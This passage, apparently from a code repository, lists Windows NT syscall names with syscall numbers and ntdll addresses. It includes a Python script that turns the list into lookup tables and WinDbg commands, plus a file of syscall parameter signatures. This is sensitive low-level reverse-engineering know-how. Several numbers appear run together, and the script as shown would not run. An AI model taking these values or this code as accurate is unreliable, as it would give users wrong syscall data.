NtPrePrepareEnlistment 0x135 00007FFEFDA0F3C0 NtPrepareComplete 0x136 00007FFEFDA0F3E0 NtPrepareEnlistment 0x0C0137 00007FFEFDA0F400 NtPrivilegeCheck 0x138 00007FFEFDA0F420 NtPrivilegeObjectAuditAlarm 0x139 00007FFEFDA0F440 NtPrivilegedServiceAuditAlarm 0x13A 00007FFEFDA0F460 NtPropagationComplete 0x13B 00007FFEFDA0F480 NtPropagationFailed 0x50 00007FFEFDA0D730 NtProtectVirtualMemory 0x13C 00007FFEFDA0F4A0 NtPssCaptureVaSpaceBulk 0x7013D 00007FFEFDA0F4C0 NtPulseEvent 0x3D 00007FFEFDA0D4D0 NtQueryAttributesFile 0x13E 00007FFEFDA0F4E0 NtQueryAuxiliaryCounterFrequency 0x13F 00007FFEFDA0F500 NtQueryBootEntryOrder 0x140 00007FFEFDA0F520 NtQueryBootOptions 0x50141 00007FFEFDA0F540 NtQueryDebugFilterState 0x50015 00007FFEFDA0CFD0 NtQueryDefaultLocale 0x40044 00007FFEFDA0D5B0 NtQueryDefaultUILanguage 0x35 00007FFEFDA0D3D0 NtQueryDirectoryFile 0x142 00007FFEFDA0F560 NtQueryDirectoryFileEx 0x143 00007FFEFDA0F580 NtQueryDirectoryObject 0x144 00007FFEFDA0F5A0 NtQueryDriverEntryOrder 0x145 00007FFEFDA0F5C0 NtQueryEaFile 0x56 00007FFEFDA0D7F0 NtQueryEvent 0x146 00007FFEFDA0F5E0 NtQueryFullAttributesFile 0x147 00007FFEFDA0F600 NtQueryInformationAtom 0x148 00007FFEFDA0F620 NtQueryInformationByName 0x149 00007FFEFDA0F640 NtQueryInformationEnlistment 0x11 00007FFEFDA0CF50 NtQueryInformationFile 0x14A 00007FFEFDA0F660 NtQueryInformationJobObject 0x14B 00007FFEFDA0F680 NtQueryInformationPort 0x19 00007FFEFDA0D050 NtQueryInformationProcess 0x14C 00007FFEFDA0F6A0 NtQueryInformationResourceManager 0x25 00007FFEFDA0D1D0 NtQueryInformationThread 0x21 00007FFEFDA0D150 NtQueryInformationToken 0x14D 00007FFEFDA0F6C0 NtQueryInformationTransaction 0x14E 00007FFEFDA0F6E0 NtQueryInformationTransactionManager 0x14F 00007FFEFDA0F700 NtQueryInformationWorkerFactory 0x40150 00007FFEFDA0F720 NtQueryInstallUILanguage 0x50151 00007FFEFDA0F740 NtQueryIntervalProfile 0x152 00007FFEFDA0F760 NtQueryIoCompletion 0x16 00007FFEFDA0CFF0 NtQueryKey 0x153 00007FFEFDA0F780 NtQueryLicenseValue 0x154 00007FFEFDA0F7A0 NtQueryMultipleValueKey 0x155 00007FFEFDA0F7C0 NtQueryMutant 0x110 00007FFEFDA0CF30 NtQueryObject 0x156 00007FFEFDA0F7E0 NtQueryOpenSubKeys 0x157 00007FFEFDA0F800 NtQueryOpenSubKeysEx 0x50031 00007FFEFDA0D350 NtQueryPerformanceCounter 0x10158 00007FFEFDA0F820 NtQueryPortInformationProcess 0x159 00007FFEFDA0F840 NtQueryQuotaInformationFile 0x51 00007FFEFDA0D750 NtQuerySection 0x15A 00007FFEFDA0F860 NtQuerySecurityAttributesToken 0x15B 00007FFEFDA0F880 NtQuerySecurityObject 0x15C 00007FFEFDA0F8A0 NtQuerySecurityPolicy 0x15D 00007FFEFDA0F8C0 NtQuerySemaphore 0x15E 00007FFEFDA0F8E0 NtQuerySymbolicLinkObject 0x15F 00007FFEFDA0F900 NtQuerySystemEnvironmentValue 0x160 00007FFEFDA0F920 NtQuerySystemEnvironmentValueEx 0x36 00007FFEFDA0D3F0 NtQuerySystemInformation 0x161 00007FFEFDA0F940 NtQuerySystemInformationEx 0x38 00007FFEFDA0D430 NtQueryTimer 0x0A0162 00007FFEFDA0F960 NtQueryTimerResolution 0x17 00007FFEFDA0D010 NtQueryValueKey 0x23 00007FFEFDA0D190 NtQueryVirtualMemory 0x49 00007FFEFDA0D650 NtQueryVolumeInformationFile 0x163 00007FFEFDA0F980 NtQueryWnfStateData 0x164 00007FFEFDA0F9A0 NtQueryWnfStateNameInformation 0x45 00007FFEFDA0D5D0 NtQueueApcThread 0x165 00007FFEFDA0F9C0 NtQueueApcThreadEx 0x166 00007FFEFDA0F9E0 NtRaiseException 0x167 00007FFEFDA0FA00 NtRaiseHardError 0x1A0006 00007FFEFDA0CDF0 NtReadFile 0x1A002E 00007FFEFDA0D2F0 NtReadFileScatter 0x168 00007FFEFDA0FA20 NtReadOnlyEnlistment 0x54 00007FFEFDA0D7B0 NtReadRequestData 0x3F 00007FFEFDA0D510 NtReadVirtualMemory 0x169 00007FFEFDA0FA40 NtRecoverEnlistment 0x16A 00007FFEFDA0FA60 NtRecoverResourceManager 0x16B 00007FFEFDA0FA80 NtRecoverTransactionManager 0x16C 00007FFEFDA0FAA0 NtRegisterProtocolAddressInformation 0x3016D 00007FFEFDA0FAC0 NtRegisterThreadTerminatePort 0x14016E 00007FFEFDA0FAE0 NtReleaseKeyedEvent 0x70020 00007FFEFDA0D130 NtReleaseMutant 0x0C000A 00007FFEFDA0CE70 NtReleaseSemaphore 0x3016F 00007FFEFDA0FB00 NtReleaseWorkerFactoryWorker 0x1C0009 00007FFEFDA0CE50 NtRemoveIoCompletion 0x170 00007FFEFDA0FB20 NtRemoveIoCompletionEx 80171h 00007FFEFDA0FB40 NtRemoveProcessDebug 0x172 00007FFEFDA0FB60 NtRenameKey 0x173 00007FFEFDA0FB80 NtRenameTransactionManager 0x174 00007FFEFDA0FBA0 NtReplaceKey 0x175 00007FFEFDA0FBC0 NtReplacePartitionUnit 0x0C 00007FFEFDA0CEB0 NtReplyPort 0x0B 00007FFEFDA0CE90 NtReplyWaitReceivePort 0x2B 00007FFEFDA0D290 NtReplyWaitReceivePortEx 0x176 00007FFEFDA0FBE0 NtReplyWaitReplyPort 0x177 00007FFEFDA0FC00 NtRequestPort 0x22 00007FFEFDA0D170 NtRequestWaitReplyPort 0x70178 00007FFEFDA0FC20 NtResetEvent 0x0C0179 00007FFEFDA0FC40 NtResetWriteWatch 0x17A 00007FFEFDA0FC60 NtRestoreKey 0x3017B 00007FFEFDA0FC80 NtResumeProcess 0x70052 00007FFEFDA0D770 NtResumeThread 0x17C 00007FFEFDA0FCA0 NtRevertContainerImpersonation 0x17D 00007FFEFDA0FCC0 NtRollbackComplete 0x17E 00007FFEFDA0FCE0 NtRollbackEnlistment 0x17F 00007FFEFDA0FD00 NtRollbackRegistryTransaction 0x180 00007FFEFDA0FD20 NtRollbackTransaction 0x181 00007FFEFDA0FD40 NtRollforwardTransactionManager 0x80182 00007FFEFDA0FD60 NtSaveKey 0x0E0183 00007FFEFDA0FD80 NtSaveKeyEx 0x0B0184 00007FFEFDA0FDA0 NtSaveMergedKeys 0x185 00007FFEFDA0FDC0 NtSecureConnectPort 0x186 00007FFEFDA0FDE0 NtSerializeBoot 0x187 00007FFEFDA0FE00 NtSetBootEntryOrder 0x188 00007FFEFDA0FE20 NtSetBootOptions 0x189 00007FFEFDA0FE40 NtSetCachedSigningLevel 0x18A 00007FFEFDA0FE60 NtSetCachedSigningLevel2 0x18B 00007FFEFDA0FE80 NtSetContextThread 0x0A018C 00007FFEFDA0FEA0 NtSetDebugFilterState 0x3018D 00007FFEFDA0FEC0 NtSetDefaultHardErrorPort 0x5018E 00007FFEFDA0FEE0 NtSetDefaultLocale 0x4018F 00007FFEFDA0FF00 NtSetDefaultUILanguage 0x190 00007FFEFDA0FF20 NtSetDriverEntryOrder 0x191 00007FFEFDA0FF40 NtSetEaFile 0x7000E 00007FFEFDA0CEF0 NtSetEvent 0x3002D 00007FFEFDA0D2D0 NtSetEventBoostPriority 0x30192 00007FFEFDA0FF60 NtSetHighEventPair 0x30193 00007FFEFDA0FF80 NtSetHighWaitLowEventPair 0x70194 00007FFEFDA0FFA0 NtSetIRTimer 0x195 00007FFEFDA0FFC0 NtSetInformationDebugObject 0x196 00007FFEFDA0FFE0 NtSetInformationEnlistment 0x27 00007FFEFDA0D210 NtSetInformationFile 0x197 00007FFEFDA10000 NtSetInformationJobObject 0x198 00007FFEFDA10020 NtSetInformationKey 0x5C 00007FFEFDA0D8A0 NtSetInformationObject 0x1C 00007FFEFDA0D0B0 NtSetInformationProcess 0x199 00007FFEFDA10040 NtSetInformationResourceManager 0x19A 00007FFEFDA10060 NtSetInformationSymbolicLink 0x0D 00007FFEFDA0CED0 NtSetInformationThread 0x19B 00007FFEFDA10080 NtSetInformationToken 0x19C 00007FFEFDA100A0 NtSetInformationTransaction 0x19D 00007FFEFDA100C0 NtSetInformationTransactionManager 0x19E 00007FFEFDA100E0 NtSetInformationVirtualMemory 0x19F 00007FFEFDA10100 NtSetInformationWorkerFactory 0x501A0 00007FFEFDA10120 NtSetIntervalProfile 0x1A1 00007FFEFDA10140 NtSetIoCompletion 0x1A2 00007FFEFDA10160 NtSetIoCompletionEx 0x1A3 00007FFEFDA10180 NtSetLdtEntries 0x301A4 00007FFEFDA101A0 NtSetLowEventPair 0x301A5 00007FFEFDA101C0 NtSetLowWaitHighEventPair 0x1A6 00007FFEFDA101E0 NtSetQuotaInformationFile 0x1A7 00007FFEFDA10200 NtSetSecurityObject 0x1A8 00007FFEFDA10220 NtSetSystemEnvironmentValue 0x1A9 00007FFEFDA10240 NtSetSystemEnvironmentValueEx 0x1AA 00007FFEFDA10260 NtSetSystemInformation 0x1AB 00007FFEFDA10280 NtSetSystemPowerState 0x501AC 00007FFEFDA102A0 NtSetSystemTime 0x501AD 00007FFEFDA102C0 NtSetThreadExecutionState 0x62 00007FFEFDA0D960 NtSetTimer 0x1AE 00007FFEFDA102E0 NtSetTimer2 0x1AF 00007FFEFDA10300 NtSetTimerEx 0x0A01B0 00007FFEFDA10320 NtSetTimerResolution 0x401B1 00007FFEFDA10340 NtSetUuidSeed 0x60 00007FFEFDA0D920 NtSetValueKey 0x1B2 00007FFEFDA10360 NtSetVolumeInformationFile 0x1B3 00007FFEFDA10380 NtSetWnfProcessNotificationEvent 0x401B4 00007FFEFDA103A0 NtShutdownSystem 0x1B5 00007FFEFDA103C0 NtShutdownWorkerFactory 0x301B6 00007FFEFDA103E0 NtSignalAndWaitForSingleObject 0x1B7 00007FFEFDA10400 NtSinglePhaseReject 0x301B8 00007FFEFDA10420 NtStartProfile 0x301B9 00007FFEFDA10440 NtStopProfile 0x1BA 00007FFEFDA10460 NtSubscribeWnfStateChange 0x301BB 00007FFEFDA10480 NtSuspendProcess 0x701BC 00007FFEFDA104A0 NtSuspendThread 0x1BD 00007FFEFDA104C0 NtSystemDebugControl 0x1BE 00007FFEFDA104E0 NtTerminateEnclave 0x701BF 00007FFEFDA10500 NtTerminateJobObject 0x7002C 00007FFEFDA0D2B0 NtTerminateProcess 0x70053 00007FFEFDA0D790 NtTerminateThread 0x201C0 00007FFEFDA10520 NtTestAlert 0x1C1 00007FFEFDA10540 NtThawRegistry 0x1C2 00007FFEFDA10560 NtThawTransactions 0x1C3 00007FFEFDA10580 NtTraceControl 0x5E 00007FFEFDA0D8E0 NtTraceEvent 0x1101C4 00007FFEFDA105A0 NtTranslateFilePath 0x1C5 00007FFEFDA105C0 NtUmsThreadYield 0x1C6 00007FFEFDA105E0 NtUnloadDriver 0x1C7 00007FFEFDA10600 NtUnloadKey 0x1C8 00007FFEFDA10620 NtUnloadKey2 0x1C9 00007FFEFDA10640 NtUnloadKeyEx 0x1CA 00007FFEFDA10660 NtUnlockFile 0x1CB 00007FFEFDA10680 NtUnlockVirtualMemory 0x2A 00007FFEFDA0D270 NtUnmapViewOfSection 0x1CC 00007FFEFDA106A0 NtUnmapViewOfSectionEx 0x1CD 00007FFEFDA106C0 NtUnsubscribeWnfStateChange 0x1CE 00007FFEFDA106E0 NtUpdateWnfStateData 0x1CF 00007FFEFDA10700 NtVdmControl 0x601D0 00007FFEFDA10720 NtWaitForAlertByThreadId 0x1D1 00007FFEFDA10740 NtWaitForDebugEvent 0x1501D2 00007FFEFDA10760 NtWaitForKeyedEvent 0x1D005B 00007FFEFDA0D880 NtWaitForMultipleObjects 0x1E001A 00007FFEFDA0D070 NtWaitForMultipleObjects32 0x0D0004 00007FFEFDA0CDB0 NtWaitForSingleObject 0x1D3 00007FFEFDA10780 NtWaitForWorkViaWorkerFactory 0x301D4 00007FFEFDA107A0 NtWaitHighEventPair 0x301D5 00007FFEFDA107C0 NtWaitLowEventPair 0x30001 00007FFEFDA0CD50 NtWorkerFactoryWorkerReady 0x1A0008 00007FFEFDA0CE30 NtWriteFile 0x1A001B 00007FFEFDA0D090 NtWriteFileGather 0x57 00007FFEFDA0D810 NtWriteRequestData 0x3A 00007FFEFDA0D470 NtWriteVirtualMemory 0x10046 00007FFEFDA0D5F0 NtYieldExecution 0x36 00007FFEFDA0D3F0 RtlGetNativeSystemInformation """ reverseDict={} normalDict={} winDbgList=[] input=win11_21H2 input=win1021h2 for each in input: # outfile = input.split(".")[0] if t >1 and t < 100000: outfile = input.split("0x") # outfile[1] try: new=(outfile[t]) syscall = new.split() print (syscall) if syscall[0] in reverseDict: print (syscall[0], " is already present!!") print ("****",reverseDict[syscall[0]]) normalDict[str(int(syscall[0],16))]=syscall[2] reverseDict[syscall[2]]=int(syscall[0],16) temp=("u ntdll!"+syscall[2] + " L2") winDbgList.append(temp) except: pass t+=1 print ("\n\nReverse Dic", len(reverseDict)) print (reverseDict) print ("\n\nNormal Dic", len(normalDict)) print (normalDict) print ("winDbgList") for each in winDbgList: print (each) ================================================ FILE: start/syscall_signatures.json ================================================ {"NtWorkerFactoryWorkerReady":(1, ["HANDLE"], ["WorkerFactoryHandle"], "NTSTATUS", ["__IN"]), "NtMapUserPhysicalPagesScatter": (3, ["PVOID", "ULONG_PTR", "PULONG_PTR"], ["*VirtualAddresses", "NumberOfPages", "UserPfnArray"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtWaitForMultipleObjects32": (5, ["ULONG", "PLONG", "WAIT_TYPE", "BOOLEAN", "PLARGE_INTEGER"], ["ObjectCount", "Handles", "WaitType", "Alertable", "Time_Out"], "Nt_WAIT_RESULT", [None, None, None, None, None]), "NtReplyWaitReceivePortEx": (5, ["HANDLE", "PVOID", "PPORT_MESSAGE", "PPORT_MESSAGE", "PLARGE_INTEGER"], ["PortHandle", "*PortContext", "ReplyMessage", "ReceiveMessage", "Time_Out"], "NTSTATUS", ["__IN", "__OUT_opt", "__IN_opt", "__OUT_opt", "__IN_opt"]), "NtQueryDefaultUILanguage": (1, ["*LANGID"], ["DefaultUILanguageId"], "NTSTATUS", [None]), "NtApphelpCacheControl": (2, ["AHC_SERVICE_CLASS", "PVOID"], ["ServiceClass", "ServiceContext"], "NTSTATUS", ["__IN_", "__IN_OUT_opt_"]), "NtCreateProcessEx": (9, ["HANDLE", "ACCESS_MASK", "OBJECT_ATTRIBUTES", "HANDLE", "BOOLEAN", "HANDLE", "HANDLE", "HANDLE", "BOOLEAN"], ["ProcessHandle", "DesiredAccess", "ObjectAttributes", "ParentProcess", "InheritObjectTable", "SectionHandle", "DebugPort", "ExceptionPort", "InJob"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN"]), "NtIsProcessInJob": (2, ["HANDLE", "HANDLE"], ["ProcessHandle", "JobHandle"], "NTSTATUS", ["__IN_", "__IN_opt_"]), "NtAccessCheckByTypeAndAuditAlarm": (16, ["PUNICODE_STRING", "PVOID", "PUNICODE_STRING", "PUNICODE_STRING", "PSECURITY_DESCRIPTOR", "PSID", "ACCESS_MASK", "AUDIT_EVENT_TYPE", "ULONG", "POBJECT_TYPE_LIST", "ULONG", "PGENERIC_MAPPING", "BOOLEAN", "PACCESS_MASK", "PNTSYSAPI", "PBOOLEAN"], ["SubsystemName", "HandleId", "ObjectTypeName", "ObjectName", "SecurityDescriptor", "PrincipalSelfSid", "DesiredAccess", "AuditType", "Flags", "ObjectTypeList", "ObjectTypeListLength", "GenericMapping", "ObjectCreation", "GrantedAccess", "NTSTATUS", "GenerateOnClose"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_", "__IN_", "__IN_", "__IN_opt_", "__IN_", "__IN_", "__IN_", None, "__IN_", "__IN_", "__IN_", None, None, None]), "NtTraceEvent": (4, ["HANDLE", "ULONG", "ULONG", "PVOID"], ["TraceHandle", "Flags", "FieldSize", "Fields"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NtPowerInformation": (5, ["POWER__INFORMATION_LEVEL", "PVOID", "ULONG", "PVOID", "ULONG"], ["InformationLevel", "InputBuffer", "InputBufferLength", "__OUTputBuffer", "__OUTputBufferLength"], "NTSTATUS", ["__IN_", None, "__IN_", None, "__IN_"]), "NtAccessCheckByType": (11, ["PSECURITY_DESCRIPTOR", "PSID", "HANDLE", "ACCESS_MASK", "POBJECT_TYPE_LIST", "ULONG", "PGENERIC_MAPPING", "PPRIVILEGE_SET", "PULONG", "PACCESS_MASK", "PNTSYSAPI"], ["SecurityDescriptor", "PrincipalSelfSid", "ClientToken", "DesiredAccess", "ObjectTypeList", "ObjectTypeListLength", "GenericMapping", "PrivilegeSet", "PrivilegeSetLength", "GrantedAccess", "NTSTATUS"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_", "__IN_", None, "__IN_", "__IN_", None, "__IN_OUT_", None, None]), "NtAccessCheckByTypeResultList": (11, ["PSECURITY_DESCRIPTOR", "PSID", "HANDLE", "ACCESS_MASK", "POBJECT_TYPE_LIST", "ULONG", "PGENERIC_MAPPING", "PPRIVILEGE_SET", "PULONG", "PACCESS_MASK", "PNTSYSAPI"], ["SecurityDescriptor", "PrincipalSelfSid", "ClientToken", "DesiredAccess", "ObjectTypeList", "ObjectTypeListLength", "GenericMapping", "PrivilegeSet", "PrivilegeSetLength", "GrantedAccess", "NTSTATUS"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_", "__IN_", None, "__IN_", "__IN_", None, "__IN_OUT_", None, None]), "NtAccessCheckByTypeResultListAndAuditAlarm": (16, ["PUNICODE_STRING", "PVOID", "PUNICODE_STRING", "PUNICODE_STRING", "PSECURITY_DESCRIPTOR", "PSID", "ACCESS_MASK", "AUDIT_EVENT_TYPE", "ULONG", "POBJECT_TYPE_LIST", "ULONG", "PGENERIC_MAPPING", "BOOLEAN", "PACCESS_MASK", "PNTSYSAPI", "PBOOLEAN"], ["SubsystemName", "HandleId", "ObjectTypeName", "ObjectName", "SecurityDescriptor", "PrincipalSelfSid", "DesiredAccess", "AuditType", "Flags", "ObjectTypeList", "ObjectTypeListLength", "GenericMapping", "ObjectCreation", "GrantedAccess", "NTSTATUS", "GenerateOnClose"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_", "__IN_", "__IN_", "__IN_opt_", "__IN_", "__IN_", "__IN_", None, "__IN_", "__IN_", "__IN_", None, None, None]), "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": (17, ["PUNICODE_STRING", "PVOID", "HANDLE", "PUNICODE_STRING", "PUNICODE_STRING", "PSECURITY_DESCRIPTOR", "PSID", "ACCESS_MASK", "AUDIT_EVENT_TYPE", "ULONG", "POBJECT_TYPE_LIST", "ULONG", "PGENERIC_MAPPING", "BOOLEAN", "PACCESS_MASK", "PNTSYSAPI", "PBOOLEAN"], ["SubsystemName", "HandleId", "ClientToken", "ObjectTypeName", "ObjectName", "SecurityDescriptor", "PrincipalSelfSid", "DesiredAccess", "AuditType", "Flags", "ObjectTypeList", "ObjectTypeListLength", "GenericMapping", "ObjectCreation", "GrantedAccess", "NTSTATUS", "GenerateOnClose"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_", "__IN_", "__IN_", "__IN_", "__IN_opt_", "__IN_", "__IN_", "__IN_", None, "__IN_", "__IN_", "__IN_", None, None, None]), "NtAddAtomEx": (4, ["PWSTR", "ULONG", "opt_", "ULONG"], ["AtomName", "Length", "PRTL_ATOM", "Flags"], "NTSTATUS", [None, "__IN_", None, "__IN_"]), "NtAddBootEntry": (2, ["PBOOT_ENTRY", "opt_"], ["BootEntry", "PULONG"], "NTSTATUS", ["__IN_", None]), "NtAddDriverEntry": (2, ["PEFI_DRIVER_ENTRY", "opt_"], ["DriverEntry", "PULONG"], "NTSTATUS", ["__IN_", None]), "NtAdjustTokenClaimsAndDeviceGroups": (16, ["HANDLE", "BOOLEAN", "BOOLEAN", "BOOLEAN", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "PTOKEN_GROUPS", "ULONG", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "ULONG", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "ULONG", "PTOKEN_GROUPS", "opt_", "opt_", "opt_"], ["TokenHandle", "UserResetToDefault", "DeviceResetToDefault", "DeviceGroupsResetToDefault", "NewUserState", "NewDeviceState", "NewDeviceGroupsState", "UserBufferLength", "PreviousUserState", "DeviceBufferLength", "PreviousDeviceState", "DeviceGroupsBufferLength", "PreviousDeviceGroups", "PULONG", "PULONG", "PULONG"], "NTSTATUS", ["__IN_", "__IN_", "__IN_", "__IN_", "__IN_opt_", "__IN_opt_", "__IN_opt_", "__IN_", None, "__IN_", None, "__IN_", None, None, None, None]), "NtAlertThreadByThreadId": (1, ["DWORD"], ["threadID"], "NTSTATUS", [None]), "NtAllocateReserveObject": (3, ["PHANDLE", "POBJECT_ATTRIBUTES", "MEMORY_RESERVE_TYPE"], ["MemoryReserveHandle", "ObjectAttributes", "Type"], "NTSTATUS", ["__OUT", "__IN_opt", "__IN"]), "NtGetNextProcess": (5, ["HANDLE", "ACCESS_MASK", "ULONG", "ULONG", "PHANDLE"], ["ProcessHandle", "DesiredAccess", "HandleAttributes", "Flags", "NewProcessHandle"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT"]), "NtGetNextThread": (6, ["HANDLE", "HANDLE", "ACCESS_MASK", "ULONG", "ULONG", "PHANDLE"], ["ProcessHandle", "ThreadHandle", "DesiredAccess", "HandleAttributes", "Flags", "NewThreadHandle"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN", "__OUT"]), "NtQueueApcThreadEx": (6, ["HANDLE", "HANDLE", "PPS_APC_R__OUTINE", "PVOID", "PVOID", "PVOID"], ["ThreadHandle", "UserApcReserveHandle", "ApcR__OUTine", "ApcArgument1", "ApcArgument2", "ApcArgument3"], "NTSTATUS", ["__IN", "__IN_opt", "__IN", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtUmsThreadYield": (1, ["PVOID"], ["SchedulerParam"], "NTSTATUS", ["__IN"]), "NtAllocateUserPhysicalPages": (3, ["HANDLE", "PULONG_PTR", "PULONG_PTR"], ["ProcessHandle", "NumberOfPages", "UserPfnArray"], "NTSTATUS", ["__IN", "__IN_OUT", "__OUT"]), "NtAllocateVirtualMemoryEx": (7, ["HANDLE", "PVOID*", "PSIZE_T", "ULONG", "ULONG", "PMEM_EXTENDED_PARAMETER", "ULONG"], ["ProcessHandle", "BaseAddress", "RegionSize", "AllocationType", "PageProtection", "ExtendedParameters", "ExtendedParameterCount"], "NTSTATUS", ["__IN_", None, "__IN_OUT_", "__IN_", "__IN_", None, "__IN_"]), "NtAlpcAcceptConnectPort": (9, ["PHANDLE", "HANDLE", "ULONG", "POBJECT_ATTRIBUTES", "PALPC_PORT_ATTRIBUTES", "PVOID", "PPORT_MESSAGE", "PALPC_MESSAGE_ATTRIBUTES", "BOOLEAN"], ["PortHandle", "ConnectionPortHandle", "Flags", "ObjectAttributes", "PortAttributes", "PortContext", "ConnectionRequest", "ConnectionMessageAttributes", "AcceptConnection"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN", "__IN_opt", "__IN", "__IN_OUT_opt", "__IN"]), "NtAlpcCancelMessage": (3, ["HANDLE", "ULONG", "ALPC_CONTEXT_ATTRIBUTES"], ["PortHandle", "Flags", "MessageContext"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtAlpcCreatePort": (3, ["PHANDLE", "POBJECT_ATTRIBUTES", "PALPC_PORT_ATTRIBUTES"], ["PortHandle", "ObjectAttributes", "PortAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt"]), "NtAlpcCreatePortSection": (6, ["HANDLE", "ULONG", "HANDLE", "ULONG", "PHANDLE", "PULONG"], ["PortHandle", "Flags", "SectionHandle", "SectionSize", "AlpcSectionHandle", "ActualSectionSize"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN", "__OUT", "__OUT"]), "NtAlpcCreateResourceReserve": (4, ["HANDLE", "__reserved", "SIZE_T", "PHANDLE"], ["PortHandle", "ULONG", "MessageSize", "ResourceID"], "NTSTATUS", ["__IN", None, "__IN", "__OUT"]), "NtAlpcCreateSectionView": (3, ["HANDLE", "__reserved", "PALPC_DATA_VIEW"], ["PortHandle", "ULONG", "ViewAttrbutes"], "NTSTATUS", ["__IN", None, "__IN_OUT"]), "NtAlpcCreateSecurityContext": (3, ["HANDLE", "__reserved", "PALPC_SECURITY_ATTRIBUTES"], ["PortHandle", "ULONG", "SecurityAttribute"], "NTSTATUS", ["__IN", None, "__IN_OUT"]), "NtAlpcDeletePortSection": (3, ["HANDLE", "__reserved", "HANDLE"], ["PortHandle", "ULONG", "SectionHandle"], "NTSTATUS", ["__IN", None, "__IN"]), "NtAlpcDeleteResourceReserve": (3, ["HANDLE", "__reserved", "HANDLE"], ["PortHandle", "ULONG", "ResourceID"], "NTSTATUS", ["__IN", None, "__IN"]), "NtAlpcDeleteSectionView": (3, ["HANDLE", "__reserved", "PVOID"], ["PortHandle", "ULONG", "ViewBase"], "NTSTATUS", ["__IN", None, "__IN"]), "NtAlpcDeleteSecurityContext": (3, ["HANDLE", "__reserved", "HANDLE"], ["PortHandle", "ULONG", "ContextHandle"], "NTSTATUS", ["__IN", None, "__IN"]), "NtAlpcDisconnectPort": (2, ["HANDLE", "ULONG"], ["PortHandle", "Flags"], "NTSTATUS", ["__IN", "__IN"]), "NtAlpcImpersonateClientOfPort": (3, ["HANDLE", "PPORT_MESSAGE", "__reserved"], ["PortHandle", "PortMessage", "PVOID"], "NTSTATUS", ["__IN", "__IN", None]), "NtAlpcOpenSenderProcess": (6, ["HANDLE", "HANDLE", "PPORT_MESSAGE", "__reserved", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["ProcessHandle", "PortHandle", "PortMessage", "ULONG", "Access", "ObjectAttribute"], "NTSTATUS", ["__OUT", "__IN", "__IN", None, "__IN", "__IN"]), "NtAlpcOpenSenderThread": (6, ["HANDLE", "HANDLE", "PPORT_MESSAGE", "__reserved", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["ThreadHandle", "PortHandle", "PortMessage", "ULONG", "Access", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN", None, "__IN", "__IN"]), "NtAlpcQueryInformation": (5, ["HANDLE", "ALPC_PORT__INFORMATION_CLASS", "_bcount", "ULONG", "__opt"], ["PortHandle", "PortInformationClass", "PVOID", "Length", "PULONG"], "NTSTATUS", ["__IN", "__IN", None, "__IN", None]), "NtAlpcQueryInformationMessage": (6, ["HANDLE", "PPORT_MESSAGE", "ALPC_MESSAGE__INFORMATION_CLASS", "_bcount", "ULONG", "__opt"], ["PortHandle", "PortMessage", "MessageInformationClass", "PVOID", "Length", "PULONG"], "NTSTATUS", ["__IN", "__IN", "__IN", None, "__IN", None]), "NtAlpcRevokeSecurityContext": (3, ["HANDLE", "__reserved", "HANDLE"], ["PortHandle", "ULONG", "ContextHandle"], "NTSTATUS", ["__IN", None, "__IN"]), "NtAlpcSendWaitReceivePort": (8, ["HANDLE", "ULONG", "PPORT_MESSAGE", "PALPC_MESSAGE_ATTRIBUTES", "PPORT_MESSAGE", "PULONG", "PALPC_MESSAGE_ATTRIBUTES", "PLARGE_INTEGER"], ["PortHandle", "Flags", "SendMessage", "SendMessageAttributes", "ReceiveMessage", "BufferLength", "ReceiveMessageAttributes", "Time_Out"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN_OUT_opt", "__IN_OUT_opt", "__IN_OUT_opt", "__IN_OUT_opt", "__IN_opt"]), "NtAlpcSetInformation": (4, ["HANDLE", "ALPC_PORT__INFORMATION_CLASS", "PVOID", "ULONG"], ["PortHandle", "PortInformationClass", "PortInformation", "Length"], "NTSTATUS", ["__IN", "__IN", "__IN_bcount", "__IN"]), "NtEnumerateBootEntries": (2, ["PVOID", "PULONG"], ["Buffer", "BufferLength"], "NTSTATUS", [None, "__IN_OUT"]), "NtEnumerateDriverEntries": (2, ["PVOID", "PULONG"], ["Buffer", "BufferLength"], "NTSTATUS", [None, "__IN_OUT"]), "NtEnumerateSystemEnvironmentValuesEx": (3, ["ULONG", "PVOID", "PULONG"], ["InformationClass", "Buffer", "BufferLength"], "NTSTATUS", ["__IN", "__OUT", "__IN_OUT"]), "NtQueryBootEntryOrder": (2, ["PULONG", "PULONG"], ["Ids", "Count"], "NTSTATUS", [None, "__IN_OUT"]), "NtQueryBootOptions": (2, ["PBOOT_OPTIONS", "PULONG"], ["BootOptions", "BootOptionsLength"], "NTSTATUS", [None, "__IN_OUT"]), "NtQueryDriverEntryOrder": (2, ["PULONG", "PULONG"], ["Ids", "Count"], "NTSTATUS", [None, "__IN_OUT"]), "NtQuerySystemEnvironmentValueEx": (5, ["PUNICODE_STRING", "LPGUID", "PVOID", "PULONG", "__opt"], ["VariableName", "VendorGuid", "Value", "ValueLength", "PULONG"], "NTSTATUS", ["__IN", "__IN", None, "__IN_OUT", None]), "NTSetBootEntryOrder": (2, ["PULONG", "ULONG"], ["Ids", "Count"], "NTSTATUS", [None, "__IN"]), "NTSetDriverEntryOrder": (2, ["PULONG", 